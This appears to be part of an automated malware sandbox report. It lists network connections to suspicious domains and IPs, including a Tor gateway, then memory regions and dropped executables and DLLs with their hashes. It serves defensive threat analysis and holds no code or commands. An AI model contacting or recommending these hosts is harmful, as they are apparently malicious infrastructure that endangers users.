US 172.67.217.100:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.192.67.172.in-addr.arpa udp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 8.8.8.8:53 242.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 114.16.185.192.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly udp
US 209.141.39.59:443 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly tcp
US 8.8.8.8:53 59.39.141.209.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
TR 94.156.8.100:80 94.156.8.100 tcp
US 8.8.8.8:53 100.8.156.94.in-addr.arpa udp

Files

memory/4080-1-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4080-2-0x00000000005C0000-0x00000000005CB000-memory.dmp

memory/4080-3-0x0000000000400000-0x0000000000474000-memory.dmp

memory/3324-4-0x00000000009A0000-0x00000000009B6000-memory.dmp

memory/4080-5-0x0000000000400000-0x0000000000474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CB3F.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\1384.exe

MD5 ae597691370226cc4354b9897415b115
SHA1 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae
SHA256 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675
SHA512 f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24

memory/2936-21-0x0000000002120000-0x00000000021B5000-memory.dmp

memory/428-20-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2936-24-0x00000000021C0000-0x00000000022DB000-memory.dmp

memory/428-23-0x0000000000400000-0x0000000000537000-memory.dmp

memory/428-25-0x0000000000400000-0x0000000000537000-memory.dmp

memory/428-26-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2335.exe

MD5 e79d42e6b51653c6a459adc6e6cd0e7d
SHA1 19590e4efcea7b916825669075fb59de0aae0600
SHA256 3e1451fbd94c852f561fdb5332a5a8576d940d95b1a8cff4dfc0285bc9fc0b14
SHA512 17f70d269b7be8fe4d8fa2b5bca88188c318991ac168d54f37237bbacaf9804e8aa7e6b81a2320bcd61d2a109728461d8082cd69e6b0ed8f1f90600b1ecaed9f

memory/1400-32-0x0000000000F40000-0x0000000000F96000-memory.dmp

memory/1400-33-0x0000000072AA0000-0x000000007318E000-memory.dmp

memory/4064-36-0x0000000000400000-0x000000000044B000-memory.dmp

memory/4064-40-0x0000000000400000-0x000000000044B000-memory.dmp

memory/1400-42-0x0000000072AA0000-0x000000007318E000-memory.dmp

memory/1400-41-0x0000000003220000-0x0000000005220000-memory.dmp

memory/4064-43-0x00000000011F0000-0x00000000011F1000-memory.dmp

memory/4064-44-0x0000000000400000-0x000000000044B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1384.exe

MD5 352df45e024d25e823f2bbec1d0a3bd1
SHA1 a3fdd3cc5100fee635ea8bb54a239b136095e800
SHA256 2bcd82a51628c8a3e55917e057238aa563e851086b82775a6f074ca53897aac3
SHA512 ef0cc0ccfdcfbfa5671acd13f85e22646bde5aabf3f9adfffdf0e486556866150a1fe5524878d56ce4a34f549186e2cc019993124e7d4ea37c6fcc0f5e47e6b8

memory/428-56-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4652-59-0x00000000021E0000-0x0000000002274000-memory.dmp

memory/608-62-0x0000000000400000-0x0000000000537000-memory.dmp

memory/608-63-0x0000000000400000-0x0000000000537000-memory.dmp

memory/608-64-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 76807ba1e95ecb83f8565d00cf05c5b4
SHA1 736eb91ea7061c996dc67c3d967301861deaaf49
SHA256 2f4ba32566855a9fb757477e51faf62b8e2b9f3878b81029e46cd36de43a1e59
SHA512 153dc5378143e2c20b105b90790c24b1f8a673df7a750d27eb988012bb871830ae1b5dd8d27b38f753883425d131ef48eb48f289f64691502ac31ae6f5bf8967

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d67fa48cf6cf5f1818b732ea24db1d6e
SHA1 44858909775b98c384307149a53b231f084427f6
SHA256 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27
SHA512 c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 b18c424040e11a16b1a7560819485dba
SHA1 8403fac73085093236a3c607590fd1c14d4a708b
SHA256 546c5c1bd196e29568210092d230d7fd9e0420faf0c245fa0b33b0ca779f3908
SHA512 1c3b707a131c3774a38eb9cd522bd947c1ec7f59245c0232e67181c61e9eb1d926f0b7641b2930742c857f96c5cec689710804b6901fe8bcc65792490f7d686e

memory/608-69-0x0000000000400000-0x0000000000537000-memory.dmp

memory/608-70-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/1232-82-0x0000000000980000-0x0000000000A80000-memory.dmp

memory/2232-79-0x0000000000400000-0x0000000000644000-memory.dmp

memory/1232-83-0x00000000007B0000-0x00000000007E1000-memory.dmp

memory/608-88-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2232-84-0x0000000000400000-0x0000000000644000-memory.dmp

memory/608-90-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2232-91-0x0000000000400000-0x0000000000644000-memory.dmp

memory/608-92-0x0000000000400000-0x0000000000537000-memory.dmp

memory/608-93-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1400-98-0x0000000003220000-0x0000000005220000-memory.dmp

memory/4064-100-0x0000000000400000-0x000000000044B000-memory.dmp

memory/2232-101-0x0000000000400000-0x0000000000644000-memory.dmp

memory/608-107-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/1232-112-0x00000000007B0000-0x00000000007E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9CDA.exe

MD5 c6c6e87f9f9ce1d439ff1edb7f9da640
SHA1 d6eb5d4886fcdf8e929cb980f6b9ae5c89be02bf
SHA256 ccfc24113db127a895833163289adb3a99bfb034fa5f48c3020ba0e2643de806
SHA512 b514000a2817664dbab753fcf7d2e9d9f562f67072de493c04a0931f86a9c3b58f902773d1c6738f7620fd86ad1c95892c2f1594bd19223f735b25136774cd7f

C:\Users\Admin\AppData\Local\Temp\9CDA.exe

MD5 7bb6e6790d9f2339cf0bda35cbba47a9
SHA1 4ad1b776f4b4289e55b8872976e7ce1984c5ea8a
SHA256 488222f6d7001124afdef37eec2de2202f566b84708b0e197127a9b7c06102aa
SHA512 9c67fd7329202d2c19295e134f2afef7ef3d4e2bc35f8711b6770e0ef5a02251cb1ed936865792e6c134d27b53776accd98ed07a7ca2f77dd0d2b66d7e767cbb

memory/224-117-0x0000000000220000-0x0000000000F05000-memory.dmp

memory/224-125-0x0000000001410000-0x0000000001411000-memory.dmp

memory/224-126-0x0000000001420000-0x0000000001421000-memory.dmp

memory/224-127-0x0000000000220000-0x0000000000F05000-memory.dmp

memory/224-128-0x0000000001450000-0x0000000001451000-memory.dmp

memory/224-130-0x0000000003050000-0x0000000003051000-memory.dmp

memory/224-129-0x0000000003040000-0x0000000003041000-memory.dmp

memory/224-131-0x0000000003060000-0x0000000003061000-memory.dmp

memory/224-133-0x0000000000220000-0x0000000000F05000-memory.dmp

memory/224-134-0x0000000003080000-0x00000000030C0000-memory.dmp

memory/224-135-0x0000000003080000-0x00000000030C0000-memory.dmp

memory/224-136-0x0000000003080000-0x00000000030C0000-memory.dmp

memory/224-137-0x0000000003080000-0x00000000030C0000-memory.dmp

memory/224-138-0x0000000003080000-0x00000000030C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B352.exe

MD5 8d6a2b7fa46fdc17a6b3ea5eae4ada26
SHA1 8170fb4a321712b885d441aee0f003857af634aa
SHA256 24fbc78418171fc48495e47f9b3e0d4d2978ca32c45b075c2b8eca856c01e6ea
SHA512 db7a4f8b1707f428ff50c11844b52903bc106a11bceecf37f7244baf74867ffaa1e7bb157e9baa7c3a0b7b7548e84bf1c5b6f39844db9ce80770d0bd546e230d

C:\Users\Admin\AppData\Local\Temp\B352.exe

MD5 3533293a2a9f1d6582e72b4e0214cf7e
SHA1 1049d46796e63b4d3007f5f0fa68d3c91b5ec02c
SHA256 6ab2d444e35f71e7896b2c8d8dafe65ef49a230a1bfa260d98ee1929c634dfeb
SHA512 9730f32371940ac3db2c5be83bed4d57ce4a55c300579d3db0c064501fbea39b96e2d440ee6ba46ab636b3944cf31a2b64b5efbbfbc3a6954377f2f2c9c51e1b

memory/224-146-0x0000000000220000-0x0000000000F05000-memory.dmp

memory/3652-149-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp

memory/3652-152-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp

memory/3652-158-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\343B.exe

MD5 2896e0b13eb74b247121f5e97e7372dc
SHA1 554c0fd24c2dd0fcf2e997b4161601ae03aa01a4
SHA256 33d6169260474dabc0c9f8fedc87114be77bfecd8767d503f88301d0332fe831
SHA512 c5e261d779920d21d866398148635739fa90905e793785aab00402b66909c3bafced3ad6547f04e077392c2a62790590af1cd3c9d7ac13974a0a6dd6b565befa

C:\Users\Admin\AppData\Local\Temp\343B.exe

MD5 4eda5246e489dfa5edadc1a46221b9b6
SHA1 5d11b441365ea64090f34c68b4cf47b9d2d701dc
SHA256 f141b5eee77d2391f8ff169914873e1219c2b47ebfde2b5bdfc0af7c6e08217b
SHA512 783b801030b15b53633509ed36c815d928a67e9c833d2c8a2cc368fda8a5b76386c34ca767636d0fd3d0262ee059af89784324701eac46f4867f8ea9e74f4625

memory/3376-163-0x00000000713F0000-0x0000000071ADE000-memory.dmp

memory/3376-164-0x0000000000F50000-0x00000000014A4000-memory.dmp

memory/3376-165-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3376-166-0x0000000005D80000-0x0000000005E1C000-memory.dmp

memory/3376-167-0x0000000006440000-0x000000000696C000-memory.dmp

memory/4204-170-0x0000000000810000-0x0000000000910000-memory.dmp

memory/4204-171-0x00000000001F0000-0x00000000001F4000-memory.dmp

memory/4796-172-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4796-175-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4796-177-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3652-181-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp

memory/3376-182-0x00000000713F0000-0x0000000071ADE000-memory.dmp

memory/3376-183-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3652-186-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp

memory/3376-190-0x0000000006A70000-0x0000000006CAC000-memory.dmp

memory/3376-191-0x00000000062F0000-0x0000000006302000-memory.dmp

memory/3376-192-0x0000000007DF0000-0x0000000007F82000-memory.dmp

memory/3376-199-0x00000000063A0000-0x00000000063B0000-memory.dmp

memory/3376-200-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3376-198-0x0000000005C50000-0x0000000005C60000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/3376-202-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3376-201-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3376-203-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/3376-206-0x0000000008310000-0x0000000008410000-memory.dmp

memory/3376-210-0x0000000008310000-0x0000000008410000-memory.dmp

memory/3376-208-0x0000000005C50000-0x0000000005C60000-memory.dmp

memory/1660-212-0x0000000000400000-0x000000000063B000-memory.dmp

memory/3376-211-0x00000000713F0000-0x0000000071ADE000-memory.dmp

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/1660-284-0x0000000000400000-0x000000000063B000-memory.dmp